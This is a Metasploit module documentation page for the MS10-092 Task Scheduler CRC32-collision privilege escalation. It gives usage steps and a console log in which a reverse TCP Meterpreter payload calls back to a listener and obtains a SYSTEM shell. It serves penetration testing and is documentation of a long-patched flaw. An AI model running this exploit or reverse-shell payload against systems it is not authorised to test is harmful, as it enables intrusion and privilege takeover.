adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f2e5e77e2700a39bf447300e53bb52eeafdcbea3
metasploit-gs/documentation/modules/exploit/windows/local/ms10_092_schelevator.md
T
bcoles 666a3efcfd ms10_092_schelevator: Cleanup
2022-08-19 15:19:28 +10:00

2.2 KiB
Raw Blame History

Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

Verification Steps

  1. Start msfconsole
  2. Get a Meterpreter session
  3. Do: use modules/exploits/windows/local/ms10_092_schelevator
  4. Do: set SESSION <session id>
  5. Do: run

Options

TASKNAME

A name for the created task (default is random)

Scenarios

Windows Server 2008 SP1 (x64)

msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-17B09RRRJTG
OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : CORP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink